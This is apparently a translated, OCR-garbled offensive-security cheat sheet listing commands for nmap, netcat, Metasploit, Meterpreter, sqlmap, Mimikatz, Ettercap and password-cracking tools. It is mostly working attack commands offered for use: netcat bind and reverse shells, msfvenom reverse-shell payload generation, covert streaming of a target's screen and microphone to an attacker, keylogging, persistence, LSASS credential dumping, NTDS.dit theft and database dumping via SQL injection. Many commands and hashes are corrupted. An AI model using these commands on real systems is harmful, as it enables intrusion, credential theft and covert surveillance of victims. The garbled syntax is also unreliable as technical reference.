Tool Syntax
How to use the tools
Nmap command
Scanning methods
-sp
Scan with ping
-sS
Scanning with syn
-sT
Scanning with connection
-sU
Scanning with udp
-so
Scanning with protocol
-sv
Scanning along with versions
-sC
Scanning with traceroute
-T4 Setting the scanning speed between 0 and 5
-oA
Scanning output with all formats
-iL list.txt
Scan the contents of the list
Capabilities
-ox file
Write inside the xml file
-oG file
Writing inside the grep file
-oA file
Storage with 3 formats
-iL file
Reading hosts from inside my file
-exclude file file
Except for the hosts in the file
Advanced features
-sV -p βscript=banner
Banners
βtraceroute
Draw a route map
βttl
ttl code
βscript
Script
Firewall evasion
-f
Crossed fasteners
-s ip
source spoof
-g #
spoof source port
-D ip , ip
Bait
βmtu #
Setting the MTU size
βspoof-mac mac
spoof mac address
βdata-length size
Size
βscan-delay script
Script
βmin-rate=X
Determining the minimum number of requests sent per second
Convert xml output to html
xsltproc nmap.xml -o nmap.html
Create active hosts
nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24 | grep "Nmap" | cut -d " " -f
5 live hosts.txt
Compare nmap results
ndiff scanl.xml scan2.xml
reverse dns lookup in ip range
nmap -R -sL -dns-server server 1.1.1.0/24
ids test (xmas scan with ips bait and spoofing)
for x in {1 .. lOOOO .. 1);do nmap -T5 -sX -S spoof-source-IP -D
comma-separated with no spaces list of decoy IPs --spoof-mac aa:bb:cc:dd:ee:ff
-e eth0 -Pn targeted-IP. Done
List of nmap scripts
List of shared routes smb-enum-shares.nse
Wireshark software
eth.addr/eth.dst.eth.src
Mac
rip.auth.passwd
Password RIP
ip.addr/ip.dst/ip.src (ipv6.)
IP
tcp.port/tcp.dstport/tcp.srcport
TCP ports
tcp.flags (ack,fin,push,reset,syn,urg)
TCP flags
udp.port/udp.dstport/udp.srcport
UDP ports
http.authbasic
Basic authentication authentication
http.www_authentication
Authentication of HTTP authentication
http.data
HTTP data
http.cookie
HTTP cookies
http.referer
HTTP referrer path
http.server
HTTP servers
http.user agent
The user-agent section in HTTP
wlan.fc.type eq 0
802.11 management frame
wlan.fc.type eq 1
802.11 control frame
wlan.fc.type eq 0
802.11 data frames
wlan.fc.type subtype eq 0 (1=reponse)
802.11 association request
wlan.fc.type_subtype eq 2 (3=response)
802.11 reassociation req
wlan.fc.type_subtype eq 4 (5=response)
802.11 probe request
wlan.fc.type_subtype eq 8
802.11 beacon
wlan.fc.type subtype eq 10
802.11 disassociate
wlan.fc.type=subtype eq 11 (12=deauthenticate)
802.11 authentication
Command operators
eq OR ==
ne OR !=
gt OR
Lt. OR
ge OR =
le OR =
Logical operators
and OR &&
or OR ||
xor OR ^^
not OR!
Netcat command
Fundamental
Connect to [TargetiP] Listener on [port]:
$ nc [Target P] [port]
Start Listener:
$ nc -1 -p [port]
Start HTTP SOCKS server at Automation-Server
./ncat - l 3128 -proxy -type http &
Scan ports
TCP Port Scanner in port range [startPort] to [endPort]:
$ nc -v -n -z -wl [TargetiP] [startPort]-[endPort]
transfer files
send file
nc.exe 10.10.10.10 < "file.log"
download file
nc -vnlp 1234 > file.txt
Grab a [filename] from a Listener:
1. Start Listener to push [filename]
$ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and Retrieve [filename]
$ nc -w3 [TargetiP] [port] [filename]
Push a [filename] to Listener:
1. Start Listener to pull [filename]
$ nc -1 -p [port] [filename]
2. Connect to [TargetiP] and push [filename]
$nc -w3 [TargetiP] [port] [filename]
Backdoor shells
Linux Shell:
$ nc -1 -p [port] -e /bin/bash
Linux Reverse Shell:
$ nc [LocaliP] [port] -e /bin/bash
Windows Shell:
$ nc -1 -p [port] -e cmd.exe
Windows Reverse Shell:
$ nc [LocaliP] [port] -e cmd.exe
Use VLC for streaming
Use cvlc \(command line VLC\) on target to migrate popups
Saving and streaming the screen through the udp protocol to the attackerβs address and port 1234
# Start a listener on the attacker machine
vlc udp://@:1234
-- OR --
# Start a listener that stores the stream in a file.
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,
ab=128,channels=2,samplerate=44100):file{dst=test.mp4) :no-sout-rtp-sap
:no-shout-standard-sap :ttl=1 :shout-keep
# This may make the users screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst=attackerip :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep
Save and stream the screen in http protocol
# Start a listener on the attacker machine
vlc http://server.example.org:BOBO
-- OR --
# Start a listener that stores the stream to a file
vlc http://server.example.org:BOBO -sout=#
transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,samp
rate=44100):file{dst=test.mp4)
# Start streaming on the target machine
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):http{mux=ffmpeg{mux=flv),dst=:8080/) :no-sout-rtp-sap :nosout-
standard-sap :ttl=1 :sout-keep
Save and stream on broadcast
# Start a listener on attacker machine for multicast
vlc udp://@ multicastaddr :1234
# Broadcast stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst= multicastaddr :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep
Save and record the screen in a file
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4)
:no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep
Record and stream microphone on udp
vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device"
SSH command
/etc/ssh/ssh known hosts #System-wide known hosts
-/.ssh/known_hosts #Hosts user has logged into
sshd-generate #Generate SSH keys (DSA/RSA)
ssh keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #Generate SSH DSA keys
ssh keygen -t rsa -f /etc/ssh/ssh_host_rsa_key #Generate SSH RSA keys
If already in ssh session, press SHIFT -C to configure tunnel
Port forwarding must be allowed on the target
/etc/ssh/sshd_config - AllowTcpForwarding YES
Connect with ssh with specific port
ssh [email protected] -p 8222
Reverse port forwarding using the tunnel (in the support user reverse shell)
ssh -R 4446:127.0.0.1:3128 [email protected]
http 127.0.0.1 4446
Set x11 victim to attacker
xhost+
vi -/.ssh/config- Ensure 'ForwardXll yes'
ssh -X [email protected]
Create port forward on port 8080 and transfer to port 443 of the attacker
ssh -R8080:12-.0.0.1:443 [email protected].
Using port forward on the attackerβs port 8080 and transferring information using ssh tunnel and port 3300 3.3.3.3
ssh -18080:3.3.3.3:443 [email protected]
Dynamic tunnel using proxychain. Also, the file /etc/proxychain.conf to set the port (1080)
ssh -D1080 [email protected]
In a separate terminal run:
proxychains nmap -sT -p80,443 3.3.3.3
Create multi-hop ssh tunnel
ssh -L 8888:127.0.0.1:8444 50mctf@MY_VPS
ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444:172.28.0.3:80 50mctf@MY_VPS
Metasploit software
msfconsole r file.rc
Load resource file
msfcli | grep exploit/window
List of Windows exploits
rnsfencode -l
list of encodes
msfpayload -h
List of payloads
show exploits
Display exploits
show auxiliary
show auxiliary module
show payloads
Show payloads
search string
Search for a specific string
search exploit string
Search exploits
searchsploit -m exploits/php/webapps/45161.py
Copy the Xploit file in the current path
info module
Display module information
use module
Load Xploit or Module
show options
Display module properties
show advanced
Show advanced settings
set option value
Set value
sessions -v
List of meetings: -k # (delete) -u # (Update Meterpreter)
sessions -s script
Run the Meterpreter script in all sessions
jobs -l
List all jobs (-k # - kill)
exploit -j
Run exploit as job
route add ip nmask sid
Rotation or Pivoting
loadpath /home/modules
Load tradeparty tree
irb
shell ruby implementation
connect -s ip 443
connect to ssl (NC clone)
route add ip mask session id
added route Β·in the pivot
exploit/multi/handler - set ExitOnSession False
Show more settings
Shells
set ConsoleLogging true (also
SessionLogging)
Enable reporting
Sqlmap command
Send request Get
sqlmap.py -u "http://url?id=1&str=val"
Send Post request
sqlmap.py -u "http://url" --data="id=1&str=val"
SQL injection in a specific parameter and knowing the type of database
sqlmap.py -u "http://url" --data="id=l&str=val" -p "id"
-b --dbms="mssqllmysqlloraclelpostgres"
SQL injection on the page requiring authentication
1. Login and note cookie value (cookie1=val1, cookie2=val2)
sqlmap.py -u "http:// url "--data="id=l&str=val" -p "id"
--cookie="cookiel=vall;cookie2=val2"
SQL injection and getting the database version and its name and user
./sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" -b --current-db
--current-user
SQL injection and get database tables db=testdb
sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" --tables -D
"testdb"
SQL injection and receiving table columns
sqlmap.py -u "http://url" --data="id=l&str=val" -p "id" --columns -T
"users"
Read from file
sqlmap.py -r req.txt
Get the records of the specified table from the specified database
sqlmap -r req -D openemr -T users_secure --dump
Using the delay technique
sqlmap -r req --technique=T
Bypass waf with unicode
sqlmap -r json --tamper=charunicodeescape --dump --level=5 --risk=3 --dbs --columns
msf
Creating meterpreter payload (for Linux: -t file -o callback)
./msfpayload windows/meterpreter/reverse tcp LHOST=ip LPORT=port R |
./msfencode -t exe -o callback.exe -e x86/shikata_ga nai -c 5
Create payload with bound meterpreter
./msfpayload windows/meterpreter/bind_tcp RP.OST=ip LPORT=port X
cb.exe
Creating a Java reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=9999 -f WAR > exploit.war
Creating a reverse shell for Windows with msfvenom
msfvenom -p windows/shell_reverse_tcp lhost=ip lport=port -f exe --platform windows >reverse.exe
Generate encoded payload using msfvenom
./msfvenorn --payload windows/meterpreter/reverse~tcp --format exe
template calc.exe -k --encoder x86/shikata_ga_nai -i 5 LHOST=1.1.1.1
LPORT=443 callback.exe
Start database msf (bt5=mysql,kali=postgresql)
/etc/rc.d/rc.mysqld start
msf db_create root:pass@localhost/metasploit
msf load db mysql
msf db connect root:pass@localhost/metasploit
msf db=import nmap.xml
--- Kali ---
# service postgresql start
# service metasploit start
return the shell (by default it will run notepad and injection)
msf use post/windows/manage/multi meterpreter inject
msf set IPLIST attack ip
msf set LPORT callback port
msf set PIDLIST PID to inject, default creates new notepad
msf set PAYLOAD windows/meterpreter/reverse_tcp
msf set SESSION meterpreter session ID
Display the html banner in the internal network
msf route add ip/range netmask meterpreter ID
msf use post/multi/gather/ping sweep # Set options and run
msf use /auxiliary/scanner/portscan/tcp # Set options and run
msf hosts-u-S x.x.x -R #Searches for x.x.x.' and sets
# RHOSTS
msf use auxiliary/scanner/http/http version # Set options and run
msf services -v -p 80-S x.x.x -R - #Displays IPs x.x.x.' with port
#80 open
Meterpreter
Command
Explanation
Help
List of available commands
sysinfo
Display system information
p.s List of processes
getpid
List of available PID
upload file C:\Program Files\
Upload file
download file
Get the file
reg command
Interaction with the registry
rev2self
Back to main user
shell
Transfer to interactive shell
migrate PID
Change to another PID
background
The current process behind the background
keys can (start|stop|dump)
Start/stop/delete keylogger
execute -f cmd.exe -i
Run cmd.exe and interact with it
execute -f crnd.exe -i -H -t
Run cmd.exe as a hidden process and get all the tokens
has dump
Get all local hashes
run script
Running the script (/scripts/meterpreter)
port fwd [add I delete] -lL 127.0.0.1 443 -r 3.3.3.3 -p 3389
Create port forward on port 3389 in the current session and remote desktop access on port 443
Increasing access level
use priv
getsystem
Impersonation token (removing the token will stop impersonation)
use incognito
list tokens -u
impersonate token domain\\user
Using nmap in meterpreter socks proxy
1. msf sessions #Note Meterpreter ID
2. msf route add 3.3.3.0 255.255.255.0 id
3. msf use auxiliary/server/socks4a
4. msf run
5. Open a new shell and edit /etc/proxychains.conf
i. #proxy_dns
ii. #socks4 127.0.0.1 9050
iii. socks4 1.1.1.1 1080
6. Save and close the conf file
7. proxychains nmap -sT -Pn -p80,:35,s45 3.3.3.3
Railgun - api related to displaying specific messages
meterprete irb
client.railgun.user32.MessageBoxA(O,"got","YOU","MB_OK")
Creating a stable Windows service
msf use post/windows/manage/persistence
msf set LHOST attack ip
msf set LPORT callback port
msf set PAYLOAD_TYPE TCPIHTTPIHTPS
msf set REXENAHE filename
msf set SESSION meterpreter session id
msf set STARTUP SERVICE
Collect the latest requested files and web links
meterpreter run post/windows/gather/dumplinks
Create a new process and command tree c:\
execute -H -f cmd.exe -a '/c tree /F /A c:\ C:\temp\tree.txt'
Ettercap software
Main-In-Middle attack using filters
ettercap.exe -I iface -M arp -Tq -F file.ef MACs / IPs / Ports
MACs / IPs / Ports
#i.e.: // 80,443 // = any MAC, any IP, ports 80,443
Main-In-Middle attack on subnet with functional fitters
ettercap -T -M arp -F filter // //
Switch flood attack
ettercap -TP rand flood
Ettercap filters
Compile ettercap filters
etterfilter filter.filter -o out.ef
Example filter - remove vpn traffic and decrypt http traffic
if lip.proto == UDP && udp.dst == 500) I
drop();
kill(); }
if I ip.src == 'ip' ) (
if (tcp.dst == 80) (
if (search(DATA.data, "Accept-Encoding")) (
replace("Accept-Encoding","Accept-Rubbish!");
msg("Replaced Encoding\n");
}
}
}
Mimikatz command
1. Upload mimikatz.exe and sekurlsa.dll to target
2. execute mirnikatz
3. mimikatz# privilege: :debug
4. mimikatz# injeet::proeess lsass.exe securlsa.dll
5. mimikatz# @getLogonPasswords
6. securlsa::minidump /users/redteam/Desktop/lsass.DMP
7. securlsa::LogonPasswords
Or
mimikatz# sekurlsa::tickets /export
mimikatz# kerberos::ptt <TICKET PATH>
Or
#cleartext password and hash
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"
Hping command3
hping3 targetiP --flood --frag --spoof ip --destport # --syn
Arping command
./arping -I eth# -a # arps
Wine command
ed /root/.wine/drive e/HinGW/bin
wine gee -o file.exe /tmp/ eode.e
wine file.exe
Grub software
GRUB Henu: Add 'single' end of kernel line. Reboot. Change root password. reboot
Hydra command
hydra -1 ftp -P words -v targetiP ftp
hashcat software
NTLMv2 crack
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
John the ripper software
Crack with word list
$ ./john -wordfile:pw.lst -format: format hash.txt
Sample formats
$ john --format~des username:SDbsuge8iC58A
$ john --format~lm username:$L~$a9c604d244c4e99d
$ john --format~md5 $1$12345678$aiccj83HRD8o6ux1bVx7D1
$ john --format~raw-sha1 A9993E364706816A8A3E25717850C26C9CDOD89D
# For --format~netlmv2 replace $NETLM with $NETLMv2
$ john --format~netlm
$NETLM$1122334455667788$0836F0858124F338958-5F81951905DD2F85252CC-318825
username:$NETLM$ll22334455667788$0836F0858124F338958"5F81951905DD2F85252CC7
318825
username:$NETLM$1122334455667788$0836F0858124F338958-5F81951905DD2F85252CC7
318825:::::::
# Exactly 36 spaces between USER and HASH (SAP8 and SAPG)
$ john --format~sapb
ROOT $8366A4E9E68"2C80
username:ROOT $8366A4E9E68"2C80
$ john --format=sapg
ROOT $1194E38F1489F3F8DA18181F14DE8"0E"8DCC239
username:ROOT
$1194E38F1489F3F8DA18181F14DE8-0E-8DCC239
$ john --format=sha1-gen
$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb"453dfe30-89
username:$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb-453dfe30-89
$ john --format=zip
$zip$'0'1'8005b1b"d07""08d'dee4
username:$zip$'0'1'8005b1b-d0"-"08d'dee4
List of passwords
Creating different words based on one word
#Add lower(@), upper(,), ~umber(%), and symbol(^) I to the end of the word
crunch 12 12 -t baseword@,%^ wordlist.txt
Use custom special character set and add 2 numbers then special character
maskprocessor -custom-charset1=\!\@\#\$ baseword?d?d?l wordlist.txt
generate wordlist from website with number
cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers
Vsown command
1. Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
2. Create a new Shadow Copj
a. cscript vssown.vbs /start (optional)
b. cscript vsown.vbs /create
3. Pull the following files frorr. a shadow copj:
a. Copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
ntds\ntds.dit.
b. copj
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
System32\config\SYSTEM.
C. COpj
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
system32\config\SAM.
4. Copj files to attack box.
5. Download tools: http://www.ntdsx~ract.com/downloads/ntds dump_hash.zip
6. Configure and Make source code for libesedb from the extracted package
a. cd libesdb
b. chmod +x configure
c. ./configure && make
Use esedbdumphash to extract the data table from ntds.dit.
a. cd esedbtools
b. . I esedbdumphash ../../ntds.dit
File hash
Hash length
MD5 16 bytes
SHA-1 20 bytes
SHA-256 32 bytes
SHA-512 64 bytes
Software with different hash databases
http://isc.sans.edu/tools/hashsearch.html
# dig +short md5 .md5.dshield.org TXT
Result = "filename I source" i.e. "cmd.exe I NIST"
Malware hash database
http://www.team-cymru.org/Services/MHR
# dig +short [MD5|SHA-1].malware.hash.cymru.com TXT
Result = last seen timestamp AV detection rate
Convert timestamp= perl-e 'print scalar localtime( timestamp ), "\n"'
Search in metadata files
https://fileadvisor.bit9.com/services/search.aspx
Search the virustotal database
https://www.virustotal.com/#search
Guess the password of the zip file
fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt secret.zip
Guess the password of the winrm service
crackmapexec winrm <IPS> -u <USERS> -p <PASSWORDS>
Guess the password of the smb service
crackmapexec smb <IP> -u <USER> -p <PASS> --shares
Connect to mssql with impackt
mssqlclient.py -port 1433 [email protected]
powershell download files
powershell iwr -usebasicparsing http://192.168.2.2/mimikatz.exe -OutFile mimikatz.exe
List of Pods
ππ’ππππ‘π πππ‘ πππ
Check if you have rights to exec into any pods
./ππ’ππππ‘π ππ’π‘β πππ β π ππ₯ππ ππππ
exec into sensitive-pod
./ππ’ππππ‘π ππ₯ππ β ππ‘ π πππ ππ‘ππ£π β πππ /πππ/πππ β
More information about the environment
kubectl get nodes -o wide
RouterSploit
Discover Devices
python rsf.py -m discovery
Scan for vulnerabilities
python rsf.py -m vulnerability
Brute Force
python rsf.py -m bruteforce
Exploit vulnerabilities
python rsf.py -m exploit
Generate Payloads
python rsf.py -m payloads
Sniffing
python rsf.py -m sniffer
Dos Attacks
python rsf.py -m dos
Password Attacks
python rsf.py -m password
Shodan Integration
python rsf.py -m shodan
Last updated